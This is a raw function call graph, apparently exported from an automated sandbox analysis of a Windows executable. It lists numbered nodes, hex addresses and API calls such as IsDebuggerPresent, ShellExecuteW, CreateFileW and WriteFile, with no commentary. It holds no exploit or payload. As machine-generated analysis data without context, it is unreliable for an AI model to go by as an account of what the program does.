91313->91295 91314 d3047e 91313->91314 91315 d30487 91314->91315 91355 d34d85 28 API calls _abort 91314->91355 91356 d2ffc0 13 API calls 2 library calls 91315->91356 91318 d3048f 91318->91303 91320 d2fe3a 91319->91320 91360 d30618 IsProcessorFeaturePresent 91320->91360 91322 d2fe46 91361 d32c24 10 API calls 3 library calls 91322->91361 91324 d2fe4b 91329 d2fe4f 91324->91329 91362 d422a7 91324->91362 91327 d2fe66 91327->91292 91329->91292 91332 d42424 91330->91332 91331 d30a0c _ValidateLocalCookies 5 API calls 91333 d303d1 91331->91333 91332->91331 91333->91303 91334 d423b1 91333->91334 91335 d423e0 91334->91335 91336 d30a0c _ValidateLocalCookies 5 API calls 91335->91336 91337 d42409 91336->91337 91337->91307 91413 d322d0 91338->91413 91341 d308ff 91341->91306 91343 d13697 IsThemeActive 91342->91343 91344 d136f2 91342->91344 91415 d34ed3 91343->91415 91354 d30912 GetModuleHandleW 91344->91354 91346 d136c2 91421 d34f39 91346->91421 91348 d136c9 91428 d13656 SystemParametersInfoW SystemParametersInfoW 91348->91428 91350 d136d0 91429 d1445d 91350->91429 91352 d136d8 SystemParametersInfoW 91352->91344 91353->91310 91354->91313 91355->91315 91356->91318 91357->91295 91358->91298 91359->91302 91360->91322 91361->91324 91366 d4d196 91362->91366 91365 d32c4d 8 API calls 3 library calls 91365->91329 91369 d4d1b3 91366->91369 91370 d4d1af 91366->91370 91368 d2fe58 91368->91327 91368->91365 91369->91370 91372 d44b8b 91369->91372 91384 d30a0c 91370->91384 91373 d44b97 ___DestructExceptionObject 91372->91373 91391 d42eee EnterCriticalSection 91373->91391 91375 d44b9e 91392 d4503f 91375->91392 91377 d44bad 91383 d44bbc 91377->91383 91405 d44a1f 29 API calls 91377->91405 91380 d44bb7 91406 d44ad5 GetStdHandle GetFileType 91380->91406 91382 d44bcd __wsopen_s 91382->91369 91407 d44bd8 LeaveCriticalSection _abort 91383->91407 91385 d30a17 IsProcessorFeaturePresent 91384->91385 91386 d30a15 91384->91386 91388 d30bdd 91385->91388 91386->91368 91412 d30ba1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 91388->91412 91390 d30cc0 91390->91368 91391->91375 91393 d4504b ___DestructExceptionObject 91392->91393 91394 d4506f 91393->91394 91395 d45058 91393->91395 91408 d42eee EnterCriticalSection 91394->91408 91409 d3f269 20 API calls __dosmaperr 91395->91409 91398 d4505d 91410 d4277c 26 API calls __cftof 91398->91410 91400 d45067 __wsopen_s 91400->91377 91401 d450a7 91411 d450ce LeaveCriticalSection _abort 91401->91411 91403 d4507b 91403->91401 91404 d44f90 __wsopen_s 21 API calls 91403->91404 91404->91403 91405->91380 91406->91383 91407->91382 91408->91403 91409->91398 91410->91400 91411->91400 91412->91390 91414 d308ec GetStartupInfoW 91413->91414 91414->91341 91416 d34edf ___DestructExceptionObject 91415->91416 91478 d42eee EnterCriticalSection 91416->91478 91418 d34eea pre_c_initialization 91479 d34f2a 91418->91479 91420 d34f1f __wsopen_s 91420->91346 91422 d34f45 91421->91422 91423 d34f5f 91421->91423 91422->91423 91483 d3f269 20 API calls __dosmaperr 91422->91483 91423->91348 91425 d34f4f 91484 d4277c 26 API calls __cftof 91425->91484 91427 d34f5a 91427->91348 91428->91350 91430 d1446d __wsopen_s 91429->91430 91431 d1c25d 22 API calls 91430->91431 91432 d14479 GetCurrentDirectoryW 91431->91432 91485 d14862 91432->91485 91434 d144a0 IsDebuggerPresent 91435 d5370f MessageBoxA 91434->91435 91436 d144ae 91434->91436 91437 d53727 91435->91437 91436->91437 91438 d144cb 91436->91438 91601 d18f2c 22 API calls 91437->91601 91564 d1480e 91438->91564 91442 d144ea GetFullPathNameW 91443 d184e7 22 API calls 91442->91443 91444 d14529 91443->91444 91580 d136fb 91444->91580 91445 d1453d 91447 d53764 SetCurrentDirectoryW 91445->91447 91448 d14545 91445->91448 91447->91448 91449 d14550 91448->91449 91602 d715a7 AllocateAndInitializeSid CheckTokenMembership FreeSid 91448->91602 91596 d145ae 7 API calls 91449->91596 91452 d5377f 91452->91449 91455 d53791 91452->91455 91603 d158e5 91455->91603 91456 d1455a 91459 d156c2 49 API calls 91456->91459 91462 d1456f 91456->91462 91458 d5379a 91610 d1b606 91458->91610 91459->91462 91461 d537a8 91464 d537d7 91461->91464 91465 d537b0 91461->91465 91463 d1458a 91462->91463 91600 d14b1d Shell_NotifyIconW ___scrt_fastfail 91462->91600 91467 d14591 SetCurrentDirectoryW 91463->91467 91468 d152b7 22 API calls 91464->91468 91469 d152b7 22 API calls 91465->91469 91470 d145a5 91467->91470 91471 d537d3 GetForegroundWindow ShellExecuteW 91468->91471 91472 d537bb 91469->91472 91470->91352 91475 d53808 91471->91475 91474 d17cf8 22 API calls 91472->91474 91476 d537c9 91474->91476 91475->91463 91477 d152b7 22 API calls 91476->91477 91477->91471 91478->91418 91482 d42f36 LeaveCriticalSection 91479->91482 91481 d34f31 91481->91420 91482->91481 91483->91425 91484->91427 91486 d1c25d 22 API calls 91485->91486 91487 d14878 91486->91487 91616 d16485 91487->91616 91489 d14896 91490 d158e5 24 API calls 91489->91490 91491 d148aa 91490->91491 91492 d1b606 22 API calls 91491->91492 91493 d148b7 91492->91493 91630 d1686d 91493->91630 91496 d53892 91693 d82c17 91496->91693 91497 d148d8 91500 d1c1c3 22 API calls 91497->91500 91499 d538a5 91501 d538b1 91499->91501 91719 d168db 91499->91719 91502 d148ee 91500->91502 91505 d168db 68 API calls 91501->91505 91652 d1890f 91502->91652 91507 d538c7 91505->91507 91511 d14aaf 22 API calls 91507->91511 91508 d1b606 22 API calls 91509 d14907 91508->91509 91510 d1c117 41 API calls 91509->91510 91512 d14917 91510->91512 91513 d538e4 91511->91513 91514 d1b606 22 API calls 91512->91514 91516 d14aaf 22 API calls 91513->91516 91515 d1493d 91514->91515 91517 d1c117 41 API calls 91515->91517 91518 d53900 91516->91518 91521 d1494c 91517->91521 91519 d158e5 24 API calls 91518->91519 91520 d53926 91519->91520 91522 d14aaf 22 API calls 91520->91522 91524 d1c25d 22 API calls 91521->91524 91523 d53932 91522->91523 91525 d1c1c3 22 API calls 91523->91525 91526 d1496a 91524->91526 91527 d53940 91525->91527 91655 d14aaf 91526->91655 91529 d14aaf 22 API calls 91527->91529 91531 d5394f 91529->91531 91535 d1c1c3 22 API calls 91531->91535 91533 d14984 91533->91507 91534 d1498e 91533->91534 91536 d349b8 _strftime 40 API calls 91534->91536 91538 d53965 91535->91538 91537 d14999 91536->91537 91537->91513 91539 d149a3 91537->91539 91540 d14aaf 22 API calls 91538->91540 91541 d349b8 _strftime 40 API calls 91539->91541 91542 d53972 91540->91542 91543 d149ae 91541->91543 91543->91518 91544 d149b8 91543->91544 91545 d349b8 _strftime 40 API calls 91544->91545 91546 d149c3 91545->91546 91547 d14a07 91546->91547 91549 d14aaf 22 API calls 91546->91549 91547->91531 91548 d14a13 91547->91548 91548->91542 91671 d17d93 91548->91671 91551 d149ea 91549->91551 91553 d1c1c3 22 API calls 91551->91553 91555 d149f8 91553->91555 91557 d14aaf 22 API calls 91555->91557 91557->91547 91559 d1890f 22 API calls 91561 d14a4c 91559->91561 91560 d18a30 23 API calls 91560->91561 91561->91559 91561->91560 91562 d14a90 91561->91562 91563 d14aaf 22 API calls 91561->91563 91562->91434 91563->91561 91565 d1481b __wsopen_s 91564->91565 91566 d14834 91565->91566 91567 d5380d ___scrt_fastfail 91565->91567 92048 d1592d 91566->92048 91570 d53829 GetOpenFileNameW 91567->91570 91572 d53878 91570->91572 91573 d184e7 22 API calls 91572->91573 91575 d5388d 91573->91575 91575->91575 91577 d14852 92076 d16328 91577->92076 91581 d13708 __wsopen_s 91580->91581 92312 d15ce6 91581->92312 91583 d1370d 91584 d13787 91583->91584 92323 d13c08 82 API calls 91583->92323 91584->91445 91586 d1371a 91586->91584 92324 d13a6d 84 API calls 91586->92324 91588 d13723 91588->91584 91589 d13727 GetFullPathNameW 91588->91589 91590 d184e7 22 API calls 91589->91590 91591 d13753 91590->91591 91592 d184e7 22 API calls 91591->91592 91593 d13760 91592->91593 91594 d53323 91593->91594 91595 d184e7 22 API calls 91593->91595 91595->91584 92359 d146ff 7 API calls 91596->92359 91598 d14555 91599 d1468e CreateWindowExW CreateWindowExW ShowWindow ShowWindow 91598->91599 91599->91456 91600->91463 91601->91445 91602->91452 91604 d51ef0 __wsopen_s 91603->91604 91605 d158f2 GetModuleFileNameW 91604->91605 91606 d1b606 22 API calls 91605->91606 91607 d15918 91606->91607 91608 d1592d 23 API calls 91607->91608 91609 d15922 91608->91609 91609->91458 91611 d1b615 _wcslen 91610->91611 91612 d2fd8b 22 API calls 91611->91612 91613 d1b63d __fread_nolock 91612->91613 91614 d2fd5b 22 API calls 91613->91614 91615 d1b653 91614->91615 91615->91461 91617 d16492 __wsopen_s 91616->91617 91618 d184e7 22 API calls 91617->91618 91619 d164c4 91617->91619 91618->91619 91625 d164fa 91619->91625 91725 d1660f 91619->91725 91621 d1b606 22 API calls 91623 d165f4 91621->91623 91622 d1b606 22 API calls 91622->91625 91626 d16aff 22 API calls 91623->91626 91624 d1660f 22 API calls 91624->91625 91625->91622 91625->91624 91629 d165cb 91625->91629 91728 d16aff 91625->91728 91628 d16600 91626->91628 91628->91489 91629->91621 91629->91628 91734 d16832 LoadLibraryA 91630->91734 91635 d5487c 91637 d168db 68 API calls 91635->91637 91636 d16898 LoadLibraryExW 91742 d167fb LoadLibraryA 91636->91742 91639 d54883 91637->91639 91641 d167fb 3 API calls 91639->91641 91643 d5488b 91641->91643 91764 d16a95 91643->91764 91644 d168c2 91644->91643 91645 d168ce 91644->91645 91647 d168db 68 API calls 91645->91647 91648 d148d0 91647->91648 91648->91496 91648->91497 91651 d548b2 91653 d2fd5b 22 API calls 91652->91653 91654 d148fa 91653->91654 91654->91508 91656 d14ad7 91655->91656 91657 d14ab9 91655->91657 91658 d184e7 22 API calls 91656->91658 91659 d14976 91657->91659 91660 d1c1c3 22 API calls 91657->91660 91658->91659 91661 d349b8 91659->91661 91660->91659 91662 d349c6 91661->91662 91663 d34a3b 91661->91663 91670 d349eb 91662->91670 91898 d3f269 20 API calls __dosmaperr 91662->91898 91900 d34a4d 40 API calls 3 library calls 91663->91900 91666 d34a48 91666->91533 91667 d349d2 91899 d4277c 26 API calls __cftof 91667->91899 91669 d349dd 91669->91533 91670->91533 91672 d17d9b 91671->91672 91673 d2fd5b 22 API calls 91672->91673 91674 d17da9 91673->91674 91901 d183b0 91674->91901 91677 d183e0 91904 d1c910 91677->91904 91679 d2fd8b 22 API calls 91681 d14a31 91679->91681 91680 d183f0 91680->91679 91680->91681 91682 d18a30 91681->91682 91683 d18a46 91682->91683 91684 d558e4 91683->91684 91690 d18a50 91683->91690 91913 d121a5 22 API calls 91684->91913 91685 d558f1 91914 d1c5e7 23 API calls ISource 91685->91914 91688 d18b6b 91688->91561 91689 d5590f 91689->91689 91690->91685 91690->91688 91691 d18b64 91690->91691 91692 d2fd5b 22 API calls 91691->91692 91692->91688 91694 d82c33 91693->91694 91695 d16abf 64 API calls 91694->91695 91696 d82c47 91695->91696 91915 d82d84 91696->91915 91699 d82c5d 91699->91499 91700 d16a95 40 API calls 91701 d82c74 91700->91701 91702 d16a95 40 API calls 91701->91702 91703 d82c84 91702->91703 91704 d16a95 40 API calls 91703->91704 91705 d82c9f 91704->91705 91706 d16a95 40 API calls 91705->91706 91707 d82cba 91706->91707 91708 d16abf 64 API calls 91707->91708 91709 d82cd1 91708->91709 91710 d3e99c ___std_exception_copy 21 API calls 91709->91710 91711 d82cd8 91710->91711 91712 d3e99c ___std_exception_copy 21 API calls 91711->91712 91713 d82ce2 91712->91713 91714 d16a95 40 API calls 91713->91714 91715 d82cf6 91714->91715 91716 d8281c 27 API calls 91715->91716 91717 d82d0c 91716->91717 91717->91699 91921 d821ec 91717->91921 91720 d168e5 91719->91720 91721 d168ec 91719->91721 91722 d3e608 67 API calls 91720->91722 91723 d168fb 91721->91723 91724 d1690c FreeLibrary 91721->91724 91722->91721 91723->91501 91724->91723 91726 d1c7c9 22 API calls 91725->91726 91727 d1661a 91726->91727 91727->91619 91729 d16b0e 91728->91729 91733 d16b2f __fread_nolock 91728->91733 91731 d2fd8b 22 API calls 91729->91731 91730 d2fd5b 22 API calls 91732 d16b42 91730->91732 91731->91733 91732->91625 91733->91730 91735 d16868 91734->91735 91736 d1684a GetProcAddress 91734->91736 91739 d3e57b 91735->91739 91737 d1685a 91736->91737 91737->91735 91738 d16861 FreeLibrary 91737->91738 91738->91735 91772 d3e4ba 91739->91772 91741 d1688c 91741->91635 91741->91636 91743 d16810 GetProcAddress 91742->91743 91744 d1682f 91742->91744 91745 d16820 91743->91745 91747 d16920 91744->91747 91745->91744 91746 d16828 FreeLibrary 91745->91746 91746->91744 91748 d2fd8b 22 API calls 91747->91748 91749 d16935 91748->91749 91824 d170c2 91749->91824 91751 d16941 __fread_nolock 91752 d16a45 91751->91752 91753 d548ca 91751->91753 91757 d1697c 91751->91757 91827 d16122 CreateStreamOnHGlobal 91752->91827 91838 d82f6b 74 API calls 91753->91838 91756 d548cf 91759 d16abf 64 API calls 91756->91759 91757->91756 91758 d16a95 40 API calls 91757->91758 91763 d16a0e ISource 91757->91763 91833 d16abf 91757->91833 91758->91757 91760 d548f2 91759->91760 91761 d16a95 40 API calls 91760->91761 91761->91763 91763->91644 91765 d16aa7 91764->91765 91768 d5491d 91764->91768 91860 d3e854 91765->91860 91769 d8281c 91881 d8266c 91769->91881 91771 d82837 91771->91651 91775 d3e4c6 ___DestructExceptionObject 91772->91775 91773 d3e4d4 91797 d3f269 20 API calls __dosmaperr 91773->91797 91775->91773 91777 d3e504 91775->91777 91776 d3e4d9 91798 d4277c 26 API calls __cftof 91776->91798 91779 d3e516 91777->91779 91780 d3e509 91777->91780 91789 d48001 91779->91789 91799 d3f269 20 API calls __dosmaperr 91780->91799 91783 d3e51f 91784 d3e532 91783->91784 91785 d3e525 91783->91785 91801 d3e564 LeaveCriticalSection __fread_nolock 91784->91801 91800 d3f269 20 API calls __dosmaperr 91785->91800 91787 d3e4e4 __wsopen_s 91787->91741 91790 d4800d ___DestructExceptionObject 91789->91790 91802 d42eee EnterCriticalSection 91790->91802 91792 d4801b 91803 d4809b 91792->91803 91796 d4804c __wsopen_s 91796->91783 91797->91776 91798->91787 91799->91787 91800->91787 91801->91787 91802->91792 91811 d480be 91803->91811 91804 d48117 91805 d44c0d __dosmaperr 20 API calls 91804->91805 91806 d48120 91805->91806 91808 d42958 _free 20 API calls 91806->91808 91809 d48129 91808->91809 91812 d48028 91809->91812 91821 d43395 11 API calls 2 library calls 91809->91821 91811->91804 91811->91812 91819 d3911d EnterCriticalSection 91811->91819 91820 d39131 LeaveCriticalSection 91811->91820 91816 d48057 91812->91816 91813 d48148 91822 d3911d EnterCriticalSection 91813->91822 91823 d42f36 LeaveCriticalSection 91816->91823 91818 d4805e 91818->91796 91819->91811 91820->91811 91821->91813 91822->91812 91823->91818 91825 d2fd5b 22 API calls 91824->91825 91826 d170d4 91825->91826 91826->91751 91828 d1613c FindResourceExW 91827->91828 91832 d16159 91827->91832 91829 d542f1 LoadResource 91828->91829 91828->91832 91830 d54306 SizeofResource 91829->91830 91829->91832 91831 d5431a LockResource 91830->91831 91830->91832 91831->91832 91832->91757 91834 d5493d 91833->91834 91835 d16ace 91833->91835 91839 d3ec73 91835->91839 91838->91756 91842 d3ea3a 91839->91842 91841 d16adc 91841->91757 91844 d3ea46 ___DestructExceptionObject 91842->91844 91843 d3ea52 91855 d3f269 20 API calls __dosmaperr 91843->91855 91844->91843 91845 d3ea78 91844->91845 91857 d3911d EnterCriticalSection 91845->91857 91848 d3ea57 91856 d4277c 26 API calls __cftof 91848->91856 91850 d3ea84 91858 d3eb9a 62 API calls 2 library calls 91850->91858 91852 d3ea98 91859 d3eab7 LeaveCriticalSection __fread_nolock 91852->91859 91854 d3ea62 __wsopen_s 91854->91841 91855->91848 91856->91854 91857->91850 91858->91852 91859->91854 91863 d3e871 91860->91863 91862 d16ab8 91862->91769 91864 d3e87d ___DestructExceptionObject 91863->91864 91865 d3e890 ___scrt_fastfail 91864->91865 91866 d3e8bd 91864->91866 91867 d3e8b5 __wsopen_s 91864->91867 91876 d3f269 20 API calls __dosmaperr 91865->91876 91878 d3911d EnterCriticalSection 91866->91878 91867->91862 91869 d3e8c7 91879 d3e688 38 API calls 4 library calls 91869->91879 91872 d3e8aa 91877 d4277c 26 API calls __cftof 91872->91877 91873 d3e8de 91880 d3e8fc LeaveCriticalSection __fread_nolock 91873->91880 91876->91872 91877->91867 91878->91869 91879->91873 91880->91867 91884 d3e478 91881->91884 91883 d8267b 91883->91771 91887 d3e3f9 91884->91887 91886 d3e495 91886->91883 91888 d3e408 91887->91888 91889 d3e41c 91887->91889 91895 d3f269 20 API calls __dosmaperr 91888->91895 91894 d3e418 __alldvrm 91889->91894 91897 d432cf 11 API calls 2 library calls 91889->91897 91891 d3e40d 91896 d4277c 26 API calls __cftof 91891->91896 91894->91886 91895->91891 91896->91894 91897->91894 91898->91667 91899->91669 91900->91666 91902 d2fd5b 22 API calls 91901->91902 91903 d14a23 91902->91903 91903->91677 91905 d1c91b 91904->91905 91906 d60728 91905->91906 91911 d1c923 ISource 91905->91911 91908 d2fd5b 22 API calls 91906->91908 91907 d1c92a 91907->91680 91909 d60734 91908->91909 91911->91907 91912 d1c990 22 API calls ISource 91911->91912 91912->91911 91913->91685 91914->91689 91916 d82d98 91915->91916 91917 d16a95 40 API calls 91916->91917 91918 d82c59 91916->91918 91919 d8281c 27 API calls 91916->91919 91920 d16abf 64 API calls 91916->91920 91917->91916 91918->91699 91918->91700 91919->91916 91920->91916 91922 d82205 91921->91922 91923 d821f7 91921->91923 91925 d8224a 91922->91925 91926 d3e57b 29 API calls 91922->91926 91949 d8220e 91922->91949 91924 d3e57b 29 API calls 91923->91924 91924->91922 91950 d82475 40 API calls __fread_nolock 91925->91950 91927 d8222f 91926->91927 91927->91925 91929 d82238 91927->91929 91929->91949 91958 d3e608 91929->91958 91930 d8228e 91931 d822b3 91930->91931 91935 d82292 91930->91935 91951 d8208f 91931->91951 91934 d8229f 91938 d3e608 67 API calls 91934->91938 91934->91949 91935->91934 91937 d3e608 67 API calls 91935->91937 91936 d822bb 91939 d822e1 91936->91939 91940 d822c1 91936->91940 91937->91934 91938->91949 91971 d82311 74 API calls 91939->91971 91942 d822ce 91940->91942 91943 d3e608 67 API calls 91940->91943 91944 d3e608 67 API calls 91942->91944 91942->91949 91943->91942 91944->91949 91945 d822fc 91948 d3e608 67 API calls 91945->91948 91945->91949 91946 d822e8 91946->91945 91947 d3e608 67 API calls 91946->91947 91947->91945 91948->91949 91949->91699 91950->91930 91952 d3e99c ___std_exception_copy 21 API calls 91951->91952 91953 d8209d 91952->91953 91954 d3e99c ___std_exception_copy 21 API calls 91953->91954 91955 d820ae 91954->91955 91956 d3e99c ___std_exception_copy 21 API calls 91955->91956 91957 d820ba 91956->91957 91957->91936 91959 d3e614 ___DestructExceptionObject 91958->91959 91960 d3e625 91959->91960 91961 d3e63a 91959->91961 91989 d3f269 20 API calls __dosmaperr 91960->91989 91969 d3e635 __wsopen_s 91961->91969 91972 d3911d EnterCriticalSection 91961->91972 91963 d3e62a 91990 d4277c 26 API calls __cftof 91963->91990 91966 d3e656 91973 d3e592 91966->91973 91968 d3e661 91991 d3e67e LeaveCriticalSection __fread_nolock 91968->91991 91969->91949 91971->91946 91972->91966 91974 d3e5b4 91973->91974 91975 d3e59f 91973->91975 91980 d3e5af 91974->91980 91992 d3db9b 91974->91992 92024 d3f269 20 API calls __dosmaperr 91975->92024 91977 d3e5a4 92025 d4277c 26 API calls __cftof 91977->92025 91980->91968 91985 d3e5d6 92009 d485cf 91985->92009 91988 d42958 _free 20 API calls 91988->91980 91989->91963 91990->91969 91991->91969 91993 d3dbb3 91992->91993 91997 d3dbaf 91992->91997 91994 d3d8e5 __fread_nolock 26 API calls 91993->91994 91993->91997 91995 d3dbd3 91994->91995 92026 d4594e 62 API calls 4 library calls 91995->92026 91998 d44d0a 91997->91998 91999 d44d20 91998->91999 92001 d3e5d0 91998->92001 92000 d42958 _free 20 API calls 91999->92000 91999->92001 92000->92001 92002 d3d8e5 92001->92002 92003 d3d8f1 92002->92003 92004 d3d906 92002->92004 92027 d3f269 20 API calls __dosmaperr 92003->92027 92004->91985 92006 d3d8f6 92028 d4277c 26 API calls __cftof 92006->92028 92008 d3d901 92008->91985 92010 d485de 92009->92010 92015 d485f3 92009->92015 92032 d3f256 20 API calls __dosmaperr 92010->92032 92012 d4862e 92034 d3f256 20 API calls __dosmaperr 92012->92034 92014 d485e3 92033 d3f269 20 API calls __dosmaperr 92014->92033 92015->92012 92018 d4861a 92015->92018 92016 d48633 92035 d3f269 20 API calls __dosmaperr 92016->92035 92029 d485a7 92018->92029 92021 d4863b 92036 d4277c 26 API calls __cftof 92021->92036 92022 d3e5dc 92022->91980 92022->91988 92024->91977 92025->91980 92026->91997 92027->92006 92028->92008 92037 d48525 92029->92037 92031 d485cb 92031->92022 92032->92014 92033->92022 92034->92016 92035->92021 92036->92022 92038 d48531 ___DestructExceptionObject 92037->92038 92039 d450d7 __wsopen_s EnterCriticalSection 92038->92039 92040 d4853f 92039->92040 92041 d48566 92040->92041 92042 d48571 92040->92042 92043 d4864e __wsopen_s 29 API calls 92041->92043 92044 d3f269 __dosmaperr 20 API calls 92042->92044 92045 d4856c 92043->92045 92044->92045 92046 d4859b LeaveCriticalSection 92045->92046 92047 d4858e __wsopen_s 92046->92047 92047->92031 92106 d51ef0 92048->92106 92051 d15974 92112 d1bfbf 92051->92112 92052 d15959 92053 d184e7 22 API calls 92052->92053 92055 d15965 92053->92055 92108 d1562b 92055->92108 92058 d147d0 92059 d51ef0 __wsopen_s 92058->92059 92060 d147dd GetLongPathNameW 92059->92060 92061 d184e7 22 API calls 92060->92061 92062 d14805 92061->92062 92063 d15489 92062->92063 92064 d1c25d 22 API calls 92063->92064 92065 d1549b 92064->92065 92066 d1592d 23 API calls 92065->92066 92067 d154a6 92066->92067 92068 d154b1 92067->92068 92069 d5404a 92067->92069 92071 d16aff 22 API calls 92068->92071 92073 d5406c 92069->92073 92124 d2d5dc 41 API calls 92069->92124 92072 d154bd 92071->92072 92118 d1285a 92072->92118 92075 d154d0 92075->91577 92077 d1686d 94 API calls 92076->92077 92078 d1634d 92077->92078 92079 d5456a 92078->92079 92080 d1686d 94 API calls 92078->92080 92081 d82c17 80 API calls 92079->92081 92082 d16361 92080->92082 92083 d5457f 92081->92083 92082->92079 92084 d16369 92082->92084 92085 d545a0 92083->92085 92086 d54583 92083->92086 92088 d16375 92084->92088 92089 d5458b 92084->92089 92087 d2fd8b 22 API calls 92085->92087 92090 d168db 68 API calls 92086->92090 92098 d545e5 92087->92098 92125 d1ad7c 92088->92125 92250 d7d978 82 API calls 92089->92250 92090->92089 92093 d54599 92093->92085 92094 d144e2 92094->91442 92094->91445 92095 d54796 92101 d5479e 92095->92101 92096 d168db 68 API calls 92096->92101 92098->92095 92098->92101 92103 d1b606 22 API calls 92098->92103 92227 d7959c 92098->92227 92230 d80a78 92098->92230 92236 d1bd9d 92098->92236 92244 d15e82 92098->92244 92251 d794cb 42 API calls _wcslen 92098->92251 92101->92096 92252 d797b9 82 API calls __wsopen_s 92101->92252 92103->92098 92107 d1593a GetFullPathNameW 92106->92107 92107->92051 92107->92052 92109 d15639 92108->92109 92110 d1ad22 22 API calls 92109->92110 92111 d1483d 92110->92111 92111->92058 92113 d1bfd9 92112->92113 92117 d1bfcc 92112->92117 92114 d2fd5b 22 API calls 92113->92114 92115 d1bfe3 92114->92115 92116 d2fd8b 22 API calls 92115->92116 92116->92117 92117->92055 92119 d1288b __fread_nolock 92118->92119 92120 d1286c 92118->92120 92121 d2fd5b 22 API calls 92119->92121 92122 d2fd8b 22 API calls 92120->92122 92123 d128a2 92121->92123 92122->92119 92123->92075 92124->92069 92126 d5f9b1 92125->92126 92127 d1ada5 92125->92127 92289 d797b9 82 API calls __wsopen_s 92126->92289 92129 d2fd8b 22 API calls 92127->92129 92131 d1adc9 92129->92131 92130 d5f9c4 92138 d1ae2f 92130->92138 92132 d17bee CloseHandle 92131->92132 92133 d1add7 92132->92133 92134 d1c25d 22 API calls 92133->92134 92135 d1ade0 92134->92135 92137 d17bee CloseHandle 92135->92137 92136 d1ae3d 92139 d1c25d 22 API calls 92136->92139 92142 d1ade9 92137->92142 92138->92136 92290 d7cc1d 92138->92290 92140 d1ae49 92139->92140 92253 d2f962 92140->92253 92144 d17bee CloseHandle 92142->92144 92146 d1adf2 92144->92146 92271 d170e5 92146->92271 92147 d1c25d 22 API calls 92149 d1ae61 92147->92149 92151 d1592d 23 API calls 92149->92151 92155 d1ae6f 92151->92155 92152 d5fde7 92302 d797b9 82 API calls __wsopen_s 92152->92302 92153 d1ae14 92279 d16d7e 27 API calls ISource 92153->92279 92258 d2f945 92155->92258 92156 d5fdfc 92156->92156 92161 d1ae26 92280 d16d67 SetFilePointerEx SetFilePointerEx SetFilePointerEx 92161->92280 92164 d1aeb2 92166 d1c25d 22 API calls 92164->92166 92165 d5fa3d 92167 d17bee CloseHandle 92165->92167 92168 d1aebb 92166->92168 92169 d5fa46 92167->92169 92170 d1c25d 22 API calls 92168->92170 92171 d1686d 94 API calls 92169->92171 92172 d1aec4 92170->92172 92174 d5fa6e 92171->92174 92281 d16bff 22 API calls 92172->92281 92176 d5fd7e 92174->92176 92179 d82c17 80 API calls 92174->92179 92175 d1aedb 92177 d17cf8 22 API calls 92175->92177 92299 d797b9 82 API calls __wsopen_s 92176->92299 92180 d1aeec SetCurrentDirectoryW 92177->92180 92181 d5fa91 92179->92181 92186 d1aeff 92180->92186 92182 d168db 68 API calls 92181->92182 92183 d5fa9f 92182->92183 92183->92176 92184 d5faa7 92183->92184 92187 d2fd5b 22 API calls 92184->92187 92185 d1b058 ISource 92267 d17bee 92185->92267 92189 d2fd8b 22 API calls 92186->92189 92188 d5facf 92187->92188 92194 d1bd9d 22 API calls 92188->92194 92191 d1af12 92189->92191 92193 d170c2 22 API calls 92191->92193 92192 d1b08a 92196 d17bee CloseHandle 92192->92196 92205 d1af1d _wcslen 92193->92205 92224 d5fb10 92194->92224 92195 d5fceb 92296 d809ea 22 API calls 92195->92296 92199 d1b09c 92196->92199 92197 d1b035 92198 d17bee CloseHandle 92197->92198 92201 d1b03e SetCurrentDirectoryW 92198->92201 92199->92094 92201->92185 92204 d5fd11 92297 d740c5 22 API calls __fread_nolock 92204->92297 92205->92197 92209 d5fdca 92205->92209 92216 d1b606 22 API calls 92205->92216 92282 d1b0d9 33 API calls 92205->92282 92283 d18fd0 GetStringTypeW 92205->92283 92284 d1901d 40 API calls 92205->92284 92285 d190bd GetStringTypeW _wcslen 92205->92285 92286 d36355 GetStringTypeW _strftime 92205->92286 92287 d190f8 136 API calls 2 library calls 92205->92287 92288 d18f2c 22 API calls 92205->92288 92300 d79464 22 API calls _wcslen 92205->92300 92207 d1bd9d 22 API calls 92207->92224 92301 d797b9 82 API calls __wsopen_s 92209->92301 92212 d5fdde 92212->92197 92214 d7959c 22 API calls 92214->92224 92216->92205 92218 d1b606 22 API calls 92218->92224 92219 d80a78 22 API calls 92219->92224 92222 d5fd53 92298 d797b9 82 API calls __wsopen_s 92222->92298 92224->92195 92224->92207 92224->92214 92224->92218 92224->92219 92224->92222 92294 d794cb 42 API calls _wcslen 92224->92294 92295 d18f2c 22 API calls 92224->92295 92225 d5fd6c 92225->92185 92228 d2fd8b 22 API calls 92227->92228 92229 d795cc __fread_nolock 92228->92229 92229->92098 92231 d80a83 92230->92231 92232 d2fd5b 22 API calls 92231->92232 92233 d80a9a 92232->92233 92234 d1b606 22 API calls 92233->92234 92235 d80aa5 92234->92235 92235->92098 92237 d1be27 92236->92237 92243 d1bdad __fread_nolock 92236->92243 92239 d2fd8b 22 API calls 92237->92239 92238 d2fd5b 22 API calls 92240 d1bdb4 92238->92240 92239->92243 92241 d1bdd2 92240->92241 92242 d2fd5b 22 API calls 92240->92242 92241->92098 92242->92241 92243->92238 92245 d15e95 92244->92245 92248 d15f39 92244->92248 92246 d2fd8b 22 API calls 92245->92246 92247 d15ec7 92245->92247 92246->92247 92247->92248 92249 d2fd5b 22 API calls 92247->92249 92248->92098 92249->92247 92250->92093 92251->92098 92252->92101 92254 d51ef0 __wsopen_s 92253->92254 92255 d2f96f GetCurrentDirectoryW 92254->92255 92256 d184e7 22 API calls 92255->92256 92257 d1ae55 92256->92257 92257->92147 92303 d1b3b0 92258->92303 92261 d16e66 92266 d16e7d 92261->92266 92262 d16f04 SetFilePointerEx SetFilePointerEx 92264 d16ed0 92262->92264 92263 d54b49 SetFilePointerEx 92264->92164 92264->92165 92265 d54b38 92265->92263 92266->92262 92266->92263 92266->92264 92266->92265 92268 d17c07 92267->92268 92269 d17bf8 92267->92269 92268->92269 92270 d17c0c CloseHandle 92268->92270 92269->92192 92270->92269 92272 d54be2 92271->92272 92273 d170fc CreateFileW 92271->92273 92274 d1711b 92272->92274 92275 d54be8 CreateFileW 92272->92275 92273->92274 92274->92152 92274->92153 92275->92274 92276 d54c10 92275->92276 92277 d16e66 3 API calls 92276->92277 92278 d54c1b 92277->92278 92278->92274 92279->92161 92280->92138 92281->92175 92282->92205 92283->92205 92284->92205 92285->92205 92286->92205 92287->92205 92288->92205 92289->92130 92291 d7cc37 WriteFile 92290->92291 92292 d7cc2c 92290->92292 92291->92136 92311 d7cb55 SetFilePointerEx SetFilePointerEx SetFilePointerEx 92292->92311 92294->92224 92295->92224 92296->92204 92297->92185 92298->92225 92299->92225 